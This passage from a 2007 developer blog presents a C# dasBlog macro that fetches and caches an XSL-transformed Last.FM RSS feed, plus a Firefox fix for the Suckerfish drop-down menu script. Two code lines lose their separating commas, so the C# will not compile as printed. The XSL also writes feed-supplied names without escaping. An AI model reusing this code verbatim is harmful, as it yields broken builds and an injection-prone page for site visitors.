            //Only redirect the user if the URL is not empty and we're not on a dev machine
            //TODO: Check the referrer to ensure we don't redirect the user to the page causing the error!
            //TODO: Pull the list of development server addresses from an XML file
            if (!String.IsNullOrEmpty(Url) && (context.Url.Host.IndexOf("localhost") < 0))
                HttpContext.Current.Response.Redirect(Url);
        }
    }
}

I’m not sure if this is a recommended way of doing it but it works pretty well and in my case, the majority of settings from the code are the same regardless of the project but you can still alter those if required –as they’re not likely to change project-project I’ve kept the settings within the web.config. I decided to wrap Phil’s code in my own because that way if he ever releases an update (not sure what that’d do tbh) I could just drop the new WebException code into my project and be ready to go straight away.

What do you think Phil? Use or Abuse of your code ;)

Friday, March 09, 2007 7:57:18 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Saturday, February 24, 2007

As part of my blog’s re-design I wanted to integrate my statistics from Last.FM which monitors what music you’re listening to and generates a stack of statistics about your listening habit (see About Last FM for more information).

Anyways, I started writing my own RSS macro when I came across one already developed by John Forsythe (http://www.jforsythe.com/) which did pretty much exactly what I was planning on developing, the only difference though was that his was hard-coded to preset node names whereas I was planning on using an XSL file to format mine to offer maximum flexibility in the long run so I updated his with the use of reflector (thanks to John Forsythe though!!).

There are a couple of difference to note with this code and John Forsythe's:

  • The RSS retrieval is no longer handled by an external library -in this instance I wanted to keep this as simple and stand-alone as possible.
  • There is no max item count at present -this is mainly because I didn't need it for the Last.FM Feed, I may alter that later.

Source code for a dasBlog XSL based RSS reader

using System;
using System.IO;
using System.Security.Cryptography;
using System.Diagnostics;
using System.Text;
using System.Web;
using System.Web.UI;

using newtelligence.DasBlog.Runtime;
using newtelligence.DasBlog.Web.Core;

namespace TSDMacros
{
    public class TheSiteDoctor
    {
        protected SharedBasePage requestPage;
        protected Entry currentEntry;

        public TheSiteDoctor(SharedBasePage page, Entry entry)
        {
            requestPage = page;
            currentEntry = entry;
        }

        /// <summary>
        /// A dasBlog macro to retrieve an RSS feed and apply XSL to 
        /// it before caching it for x minutes
        /// </summary>
        /// <param name="xslVPath">The virtual path of the XSL file</param>
        /// <param name="rssPath">The RSS feed URL</param>
        /// <param name="minutesToCache">Number of minutes to cache the file for</param>
        /// <param name="debugMode">Output the debug information</param>
        /// <returns>A control that can be inserted into a dasBlog template</returns>
        public virtual Control GetRSS(string xslVPath, string rssPath, int minutesToCache, bool debugMode)
        {
            string cacheVDir = "./content/getrsscache/";
            string cachedFileLoc = String.Empty;
            StringBuilder output = new StringBuilder();

            bool writeToCache = false;
            bool cacheExpired = false;
            bool cacheExists = false;

            #region Debug output
            if (debugMode)
            {
                output.Append("<strong>&lt;start debug&gt;</strong><hr />\r\n");
                output.AppendFormat("<i>RssPath</i>: {0}<br />\r\n", rssPath);
                output.AppendFormat("<i>minutesToCache</i>: {0}<br />\r\n", minutesToCache);
                output.AppendFormat("<i>CacheStorageFolder</i>: {0}<br />\r\n", cacheVDir);
                output.Append("<hr />\r\n");
            }
            #endregion

            #region Check whether we need to cache or not
            if (minutesToCache > 0)
            {
                writeToCache = true;
                //Find the cache directory
                string cacheDir = HttpContext.Current.Server.MapPath(cacheVDir);
                //Work out what the file would be called based on the RSS URL
                cachedFileLoc = Path.Combine(cacheDir, HttpUtility.UrlEncode(TheSiteDoctor.GetMd5Sum(rssPath)) + ".cache");
                #region Debug output
                if (debugMode)
                {
                    output.AppendFormat("<i>cache file</i>: {0}\r\n", cachedFileLoc);
                }
                #endregion
                if (!File.Exists(cachedFileLoc))
                {
                    cacheExpired = true;
                    #region Debug output
                    if (debugMode)
                    {
                        output.Append("<i>cache age</i>: no file exists<br />");
                    }
                    #endregion
                }
                else
                {
                    FileInfo info1 = new FileInfo(cachedFileLoc);
                    TimeSpan span1 = (TimeSpan)(DateTime.Now - info1.LastWriteTime);
                    if (span1.TotalMinutes > minutesToCache)
                    {
                        cacheExists = true;
                        cacheExpired = true;
                    }
                    #region Debug output
                    if (debugMode)
                    {
                        output.AppendFormat("<i>cache age</i>: : {0} min old <br />\r\n", span1.TotalMinutes);
                    }
                    #endregion
                }
            }
            else
            {
                #region Debug output
                if (debugMode)
                {
                    output.Append("<strong>caching disabled - CacheStorageAgeLimit=0</strong><br /><span style=\"color:red; font-weight: bold;\">FYI: All requests to this page will cause a new server request to the RssPath</span><br />");
                }
                #endregion
                cacheExpired = true;
            }

            #endregion

            #region Debug output
            if (debugMode)
            {
                output.Append("<hr />");
            }
            #endregion
            //Check whether or not the cache has expired
            if (cacheExpired)
            {
                #region Debug output
                if (cacheExists & debugMode)
                {
                    output.Append("<strong>file cache is expired, getting a new copy right now</strong><br />");
                }
                else if (debugMode)
                {
                    output.Append("<strong>no cache, getting file</strong><br />");
                }
                #endregion
                //The cache has expired so retrieve a new copy
                output.Append(TheSiteDoctor.delegateRss(xslVPath, rssPath, 0, writeToCache, cachedFileLoc, debugMode));
            }
            else
            {
                #region Debug output
                if (debugMode)
                {
                    output.Append("<strong>cool, we got the file from cache</strong><br />");
                }
                #endregion
                //The cache still exists and is valid
                StreamReader reader1 = File.OpenText(cachedFileLoc);
                output.Append(reader1.ReadToEnd());
                reader1.Close();
            }
            #region Debug output
            if (debugMode)
            {
                output.Append("<hr /><strong>&lt;end debug&gt;</strong>");
            }
            #endregion

            output.Append("\r\n<!-- \r\ndasBlog RSS feed produced using the macro from Tim Gaunt\r\nhttp://blogs.thesitedoctor.co.uk/tim/\r\n-->");

            return new LiteralControl(output.ToString());
        }

        /// <summary>
        /// RSS feed retrieval worker method. Retrieves the RSS feed 
        /// and applies the specified XSL document to it before caching 
        /// a copy to the disk -this should be called after it has been 
        /// established the cache is out of date.
        /// </summary>
        /// <param name="xslVPath">The virtual path of the XSL file</param>
        /// <param name="rssPath">The RSS feed URL</param>
        /// <param name="timeoutSeconds">Number of seconds before the request should timeout</param>
        /// <param name="writeCache">Whether to cache a copy on disk</param>
        /// <param name="xmlPath">Physical path of the XML file on the disk</param>
        /// <param name="debugMode">Output the debug information</param>
        /// <returns>An XML document as a string</returns>
        private static string delegateRss(string xslVPath, string rssPath, int timeoutSeconds, bool writeCache, string xmlPath, bool debugMode)
        {
            StringBuilder output = new StringBuilder();
            bool errorThrown = false;
            string cacheVDir = "./content/getrsscache/";
            string xslPath = HttpContext.Current.Server.MapPath(xslVPath);

            try
            {
                //TODO: Replace this with a HttpRequest and timeout to ensure the visitor is not left waiting for the file to load
                //Load the XML
                System.Xml.XmlDocument xmlDoc = new System.Xml.XmlDocument();
                xmlDoc.Load(rssPath);

                //Load the XSL
                System.Xml.Xsl.XslTransform xslDoc = new System.Xml.Xsl.XslTransform();
                xslDoc.Load(xslPath);
                
                StringBuilder sb = new StringBuilder();
                StringWriter sw = new StringWriter(sb);

                //Apply the XSL to the XML document
                xslDoc.Transform(xmlDoc, null, sw);

                //Append the resulting code to the output file
                output.Append(sb.ToString());
            }
            catch (Exception ex)
            {
                errorThrown = true;
                #region Debug output
                if (debugMode)
                {
                    //Log the exception to the dasBlog exception handler
                    ErrorTrace.Trace(TraceLevel.Error, ex);
                    output.AppendFormat("<ul style=\"\"><li><strong>RSS request failed :(</strong> <br />{0}</li></ul>", ex.ToString());
                }
                #endregion
            }

            //Save a cache of the returned RSS feed if no errors occured
            if (writeCache & !errorThrown)
            {
                //Find the cache's storage directory
                DirectoryInfo dir = new DirectoryInfo(HttpContext.Current.Server.MapPath(cacheVDir));
                //Check it exists
                if (!dir.Exists)
                {
                    dir.Create();
                    #region Debug output
                    if (debugMode)
                    {
                        output.AppendFormat("<strong>just created the directory:</strong> {0}<br />"HttpContext.Current.Server.MapPath(cacheVDir));
                    }
                    #endregion
                }
                //Create the file
                StreamWriter writer1 = File.CreateText(xmlPath);
                writer1.Write(output);
                writer1.Flush();
                writer1.Close();
                #region Debug output
                if (debugMode)
                {
                    output.Append("<strong>just wrote the new cache file</strong><br />");
                }
                #endregion
            }

            return output.ToString();
        }

        /// <summary>
        /// Worker method to identify the MD5 checksum of a string
        /// in this instance used to ensure the RSS file isn't already
        /// cached (based on the URL supplied)
        /// </summary>
        /// <param name="str"></param>
        /// <returns></returns>
        public static string GetMd5Sum(string str)
        {
            Encoder encoder1 = Encoding.Unicode.GetEncoder();
            byte[] buffer1 = new byte[str.Length * 2];
            encoder1.GetBytes(str.ToCharArray(), 0, str.Length, buffer1, 0true);
            byte[] buffer2 = new MD5CryptoServiceProvider().ComputeHash(buffer1);
            StringBuilder builder1 = new StringBuilder();
            for (int minsToCache = 0; minsToCache < buffer2.Length; minsToCache++)
            {
                builder1.Append(buffer2[minsToCache].ToString("X2"));
            }
            return builder1.ToString();
        }

    }
}

XSL that I use for Last.FM

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="html" /> 
  <xsl:template match="/">
    <h2>Recent Tracks</h2>
    <ul>
    <xsl:for-each select="recenttracks/track">
        <li>
            <a href="{url}">
                <xsl:value-of select="artist" /> - <em><xsl:value-of disable-output-escaping="yes" select="name" /></em>
            </a>
        </li>
    </xsl:for-each>
    </ul>
    <p><a href="About-Last-FM.aspx" title="last.fm - The Social Music Revolution"><img alt="last.fm - The Social Music Revolution" src="images/lastfm_mini_black.gif" /></a></p>
  </xsl:template>
</xsl:stylesheet>

To use it on the blog template

<% GetRSS("LastFM.xsl", "http://ws.audioscrobbler.com/1.0/user/timgaunt/recenttracks.xml", 25, false)|tsd %>

This is a pretty crude way of doing it IMHO because the XSL transforms the stream directly, eventually I’ll update the code so it includes a timeout (as John’s did) and having seen the performance implications on my blog, make sure the request is made asynchronously.

FWIW I have set my cache value to 25minutes, I did have it as 1min for fun but it killed the blog, why have I set it to 25mins? Well, most of my tracks I would think are 2-3minutes long, as I list 10 tracks at a time that’s 20-30minutes listening time so it’ll still keep a fairly accurate overview of my tracks without having massive performance issues on my blog :)

Incase you don't want to or know how to create this macro as a DLL I have created it for you :)

dasBlog RSS feed macro" onclick="javascript:urchinTracker('/download/zip/TSDMacros_v1_23-02-07');" href="/tim/files/TSDMacros_v1_23-02-07.zip">Download the complete dasBlog RSS feed macro (4KB - MD5 Hash: e3d7d6320109fd07259e8d246b754f13)

Saturday, February 24, 2007 2:39:04 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Friday, February 23, 2007

We’re currently reworking www.florame.co.uk to improve it’s search engine ranking from virtually non-existent to (hopefully) first page for various inflections of organic aromatherapy, organic essential oils and all sorts of other aromatherapy products.

Despite the on-going debate on whether search engine crawlers prefer pretty XHTML or not, I still believe strongly that having your site’s content as the dominant code on every page MUST be better than having a plethora of tags (aka tag soup) but that’s for another post. So, with my feelings on XHTML (or at least neat HTML) in mind one of our recommendations was to re-work the site’s code –most importantly with the removal of the JavaScript menu at the top which is seriously impeding the site’s ranking. I decided we should opt for a form of CSS menu and those in the know, know there are only a few available options, for reference we used Suckerfish drop down menu.

The Suckerfish CSS drop down menu has been fairly heavily tested but I think I’ve found an issue with Firefox, basically the JavaScript marks up the LI with a hover class (sfhover) which then ensures it works as expected (this isn’t needed in IE7 or FF btw). The catch I’ve found however is that in FF1.5 (will test in 2.0) with scripts enabled, the menus are staying shown.

After a little head scratching the issue was narrowed down to this line of JavaScript:

this.className = this.className.replace(new RegExp(" sfhover\\b"), "");

Thanks to Firebug I was able to step through the code and check out the properties at every stage, in this instance I found that Firefox trims the leading and trailing space from the className so instead of it reading class="sfhover" as it is written, it had class="sfhover" which may be correct in some ways but obviously cocked up the regEx.

The solution is really rather simple, just change the space so it’s optional:

this.className = this.className.replace(new RegExp("\\s?sfhover\\b"), "");

It’s not an ideal fix but in the case of Florame organic aromatherapy it sorted the issue :) I’m going let Mozilla know about this as in some ways I think this is a glitch (though I can see their thinking that the developer didn’t mean to add the leading space) to see what they say. It wouldn't surprise me though if it was something I had done wrong!

For reference, the entire menu script now reads:

<script type="text/javascript"><!--//--><![CDATA[//><!--
sfHover = function() {
    var sfEls = document.getElementById("nav").getElementsByTagName("LI");
    for (var i=0; i<sfEls.length; i++) {
        sfEls[i].onmouseover=function() {
            this.className += " sfhover";
        }
        sfEls[i].onmouseout=function() {
            this.className = this.className.replace(new RegExp("\\s?sfhover\\b"), "");
        }
    }
}
if (window.attachEvent) window.attachEvent("onload", sfHover);
//--><!]]></script>

Update 7th May 2007: Darren over at Forma3 has come up with a new an improved version of the SuckerFish menu which includes a number of nice improvements and is well worth checking out: CSS drop down menus with persistent top level menu styling

Friday, February 23, 2007 6:20:17 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [3]  |